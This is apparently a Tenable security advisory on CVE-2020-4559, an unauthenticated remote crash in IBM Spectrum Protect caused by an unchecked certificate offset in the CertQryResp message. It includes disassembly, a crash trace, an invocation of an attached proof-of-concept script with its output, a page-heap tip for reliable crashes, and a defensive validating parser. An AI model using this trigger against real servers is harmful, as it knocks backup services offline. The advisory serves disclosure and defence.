
IBM Spectrum Protect CertQryResp Unauthenticated Remote DoS

High

Synopsis

Tenable research discovered a DoS vulnerability in IBM Spectrum Protect (ISP) 8.1.9.300. The flaw exists in the adsmdll.dll and dstadll.dll files due to improper validation of user-supplied data when processing a CertQryResp verb message sent to default TCP port 1500.

An unauthenticated, remote attacker can exploit the issue, via a series of specially crafted messages, to terminate the dsmsvc and dstasvc (Storage Agent) processes.

The CertQryResp verb message has the following format:

//  be = big endian (all multi-byte fields are in network byte order)
#include <stdint.h>

typedef uint16_t be16;  // 16-bit big-endian field
typedef uint32_t be32;  // 32-bit big-endian field
typedef uint8_t  int8;  // 8-bit field (the advisory's "int8")

#pragma pack(push, 1)   // wire layout: no padding between fields

// Mandatory verb header
struct hdr
{
   be16 verbLen;  // 16-bit total len of the verb; 0 if verbType is 8
   int8 verbType; // 8-bit verb type 
                  // if verbType == 8, it's an extended verb and
                  // hdr_ex follows this header
   int8 magic;    // must be 0xCA 
};

// Optional extended verb header
// Used for verbTypes that are greater than 0x100
struct hdr_ex
{
   be32 verbType; // 32-bit verb type
   be32 verbLen;  // 32-bit total len of the verb
};

struct CertQryResp
{
   // Generic headers 
   struct hdr hdr;      // hdr.verbType = 8
   struct hdr_ex hdr2;  // hdr2.verbType = 0x00031900
   // verb-specific header starts
   int8 version;     
   be16 dataOffset;  // offset to the msg where the verb data starts
   be16 opRC;
   be16 certFormat;
   be16 certOffset;  // offset to the verb data where the certificate starts
   be16 certLength;
   // verb data starts
   int8 cert[];      // flexible array member: certLength bytes of certificate
};

#pragma pack(pop)

All ISP verbs are validated in the SmIsValidVerbEx() function in adsmdll.dll/dstadll.dll. However, the function only checks to make sure CertQryResp.dataOffset falls within the message boundary (i.e., sizeof(CertQryResp)):

.text:000000018099AD2F      lea     rcx, [rdi+verbCertQryResp.dataOffset]
.text:000000018099AD33      call    GetTwo
.text:000000018099AD38      movzx   eax, ax
.text:000000018099AD3B      cmp     eax, r15d ; r15d = MsgSize
.text:000000018099AD3E      jbe     ok_1809A331

It does not check whether or not CertQryResp.dataOffset + CertQryResp.certOffset is within the message boundary. When the CertQryResp verb message is processed, the pointer to the certificate is calculated as: pCert = pCertQryResp + pCertQryResp->dataOffset + pCertQryResp->certOffset:

.text:0000000180AE8466      lea     rcx, [rsi+verbCertQryResp.certOffset]
.text:0000000180AE846A      call    GetTwo
.text:0000000180AE846F      lea     rcx, [rsi+verbCertQryResp.dataOffset]
.text:0000000180AE8473      movzx   ebx, ax
.text:0000000180AE8476      call    GetTwo
.text:0000000180AE847B      lea     rcx, [rsi+verbCertQryResp.certLength]
.text:0000000180AE847F      movzx   r15d, ax
.text:0000000180AE8483      add     r15, rbx ; dataOffset + certOffset
.text:0000000180AE8486      add     r15, rsi
.text:0000000180AE8489      call    GetTwo
.text:0000000180AE848E      movzx   r14d, ax

This can cause an out-of-bounds read on the certificate if CertQryResp.certOffset contains a value (e.g., 0xffff) that is greater than the message size. The out-of-bounds read can cause an access violation (i.e., pCert lands in an inaccessible page), resulting in process termination:

(d6c.74c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
MSVCR120!MoveSmall+0x1aa:
00007fff`4877c64a 4c8b540af8      mov     r10,qword ptr [rdx+rcx-8] ds:000001d3`2f477fff=????????????????
0:414> k
 # Child-SP          RetAddr           Call Site
00 00000028`b01fe198 00007fff`42755475 MSVCR120!MoveSmall+0x1aa [f:\dd\vctools\crt\crtw32\string\amd64\memcpy.asm @ 362] 
01 00000028`b01fe1a0 00007fff`427d3324 gsk8cms_64!GSKASNUtility::asncpy+0x2a5
02 00000028`b01fe1d0 00007fff`40f9e642 gsk8cms_64!GSKString::GSKString+0x64
03 00000028`b01fe210 00007fff`40f766d4 gsk8km_64!GSKKM_strerror+0x254b2
04 00000028`b01fe720 00007fff`37d24ed7 gsk8km_64!GSKKM_OpenKeyDbData+0xa4
05 00000028`b01fe780 00007fff`37e984eb adsmdll!tlsValidateKeyDbPw+0xb7
06 00000028`b01fe850 00007fff`37e99286 adsmdll!HandleCertQryResp+0x1cb
07 00000028`b01fe8d0 00007fff`37e96b7a adsmdll!HandleNegotiate+0x756
08 00000028`b01fea30 00007fff`37d75c46 adsmdll!SmV2AuthProcess+0x28a
09 00000028`b01feab0 00007fff`380d00da adsmdll!smExecuteSession+0x3a6
0a 00000028`b01ff7f0 00007fff`373bc413 adsmdll!SessionThread+0x43a
0b 00000028`b01ff8b0 00007fff`48764f7f adsmdll!startThread+0x153
0c 00000028`b01ff900 00007fff`48765126 MSVCR120!_callthreadstartex+0x17 [f:\dd\vctools\crt\crtw32\startup\threadex.c @ 376] 
0d 00000028`b01ff930 00007fff`546b84d4 MSVCR120!_threadstartex+0x102 [f:\dd\vctools\crt\crtw32\startup\threadex.c @ 354] 
0e 00000028`b01ff960 00007fff`5711e871 KERNEL32!BaseThreadInitThunk+0x14
0f 00000028`b01ff990 00000000`00000000 ntdll!RtlUserThreadStart+0x21
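As an added example (not the advisory's PoC, and not IBM's code), the following Python parser applies both the dataOffset check that SmIsValidVerbEx() performs and the dataOffset + certOffset + certLength check that it lacks, so a CertQryResp whose certificate would fall outside the message is rejected before anything dereferences it. It assumes a message holds exactly one verb; the function and class names (parse_certqryresp, build_certqryresp, VerbError) are my own, and build_certqryresp only constructs sample messages for exercising the parser.

```python
import struct

VERB_TYPE_EXTENDED = 0x08      # hdr.verbType that announces an hdr_ex
VERB_MAGIC = 0xCA              # hdr.magic
VERB_CERTQRYRESP = 0x00031900  # hdr_ex.verbType for CertQryResp

# Fixed-size, big-endian part of the verb as laid out above: hdr, hdr_ex,
# then version, dataOffset, opRC, certFormat, certOffset, certLength.
_HDR = struct.Struct(">HBB")
_HDR_EX = struct.Struct(">II")
_FIXED = struct.Struct(">BHHHHH")
FIXED_LEN = _HDR.size + _HDR_EX.size + _FIXED.size  # 23 bytes

class VerbError(ValueError):
    """Raised for any CertQryResp that does not fit inside its message."""

def parse_certqryresp(msg: bytes) -> dict:
    """Parse one CertQryResp verb, rejecting offsets that leave the message."""
    msg_size = len(msg)
    if msg_size < FIXED_LEN:
        raise VerbError("message shorter than the fixed CertQryResp header")
    _, verb_type, magic = _HDR.unpack_from(msg, 0)
    if magic != VERB_MAGIC or verb_type != VERB_TYPE_EXTENDED:
        raise VerbError("not an extended verb")
    ext_type, ext_len = _HDR_EX.unpack_from(msg, _HDR.size)
    if ext_type != VERB_CERTQRYRESP or ext_len != msg_size:
        raise VerbError("wrong verb type or verbLen != message size")
    fields = _FIXED.unpack_from(msg, _HDR.size + _HDR_EX.size)
    version, data_off, op_rc, cert_fmt, cert_off, cert_len = fields
    # The check SmIsValidVerbEx() performs: dataOffset inside the message.
    if data_off > msg_size:
        raise VerbError("dataOffset beyond message")
    # The missing check: dataOffset + certOffset + certLength must fit too
    # (Python ints do not overflow; in C compare against the remaining size).
    cert_start = data_off + cert_off
    cert_end = cert_start + cert_len
    if cert_end > msg_size:
        raise VerbError("certificate beyond %d-byte message" % msg_size)
    return {"version": version, "opRC": op_rc, "certFormat": cert_fmt,
            "cert": msg[cert_start:cert_end]}

def build_certqryresp(cert: bytes, cert_off=0, cert_len=None) -> bytes:
    """Constructed sample verb (not a real ISP capture) to exercise the parser."""
    if cert_len is None:
        cert_len = len(cert)
    body = _FIXED.pack(1, FIXED_LEN, 0, 0, cert_off, cert_len) + cert
    total = _HDR.size + _HDR_EX.size + len(body)
    # hdr.verbLen is 0 because verbType is 8; the real length is in hdr_ex.
    return (_HDR.pack(0, VERB_TYPE_EXTENDED, VERB_MAGIC)
            + _HDR_EX.pack(VERB_CERTQRYRESP, total) + body)
```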

Proof of Concept

Attached is a PoC to terminate dsmsvc.exe. The PoC can be used as follows:

python3 ibm_spectrum_protect_CertQryResp_dos_CVE-2020-4559.py -t <target_host> -p 1500
...   
connection 00000300: certSize 00001500, certOffset 0000f000
connection 00000301: certSize 00001600, certOffset 00001000
connection 00000302: certSize 00001600, certOffset 00002000
connection 00000303: certSize 00001600, certOffset 00003000
connection 00000304: certSize 00001600, certOffset 00004000
connection 00000305: certSize 00001600, certOffset 00005000
Traceback (most recent call last):
  File "ibm_spectrum_protect_CertQryResp_dos.py", line 110, in <module>
    r = recv_verb(s)
  File "ibm_spectrum_protect_CertQryResp_dos.py", line 47, in recv_verb
    hdr1 = s.recv(4)
ConnectionResetError: [Errno 104] Connection reset by peer

Note that we tested the PoC on a Windows Server 2016 virtual machine with 2 CPUs and 16 GB of memory. The script may or may not terminate dsmsvc.exe depending on the memory page where pCert lands. To produce a reliable crash, full page heap can be enabled on dsmsvc.exe:

C:\Program Files (x86)\Windows Kits\10\Debuggers\x64>gflags /p /enable dsmsvc.exe /full

This puts the CertQryResp verb message at the end of a page followed by a non-accessible guard page.

Solution

Upgrade to either 7.1.11.000 or 8.1.10.100.

Disclosure Timeline

05/11/2020 - Vulnerability discovered
05/12/2020 - Reported via CERT/cc web form. Report tracked as VRF#20-05-ZFGDR. 90-day date is Aug 10, 2020.
05/12/2020 - Tenable receives automated reply from CERT.
05/27/2020 - Tenable asks if CERT has reviewed this report.
05/27/2020 - CERT apologizes for the delayed response. Tells us about their new portal. They will send out the report tomorrow.
05/28/2020 - CERT notifies us that the report was sent to IBM.
05/28/2020 - Tenable thanks CERT for the update.
06/16/2020 - IBM has asked for 3 extra weeks, bringing disclosure to 08/31/2020.
06/22/2020 - Tenable denies request for 3 week extension. Allows for 2 weeks, per our policy. Pushes disclosure date to 08/24/2020.
06/29/2020 - IBM requests that we coordinate disclosure on 08/31/2020.
06/29/2020 - Tenable denies the request. Explains that we can push as far as 08/24/2020. Otherwise, we will disclose on 08/10/2020.
07/02/2020 - IBM explains that CERT sent the report to them on May 28. Cites our policy and asks that we coordinate on an August 31 disclosure.
07/02/2020 - Tenable agrees, and updates the 90-day date to August 26, 2020. However, the coordinated date is within the grace period, so disclosure date is set at August 31. Asks IBM if we can contact them directly for future reports.
07/02/2020 - IBM agrees to us contacting them directly.
07/02/2020 - Tenable thanks IBM.
08/27/2020 - IBM notifies Tenable of the fix and bulletin release.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.


Risk Information

CVE ID: CVE-2020-4559
Tenable Advisory ID: TRA-2020-50
CVSSv2 Base / Temporal Score: 7.8 / 6.1
CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C
CVSSv3 Base / Temporal Score: 7.5 / 6.7
CVSSv3 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Affected Products:
- IBM Spectrum Protect Server versions 8.1.0.000-8.1.10.000; 7.1.0.000-7.1.10.xxx
Risk Factor: High

Advisory Timeline

08/28/2020 - Advisory published.
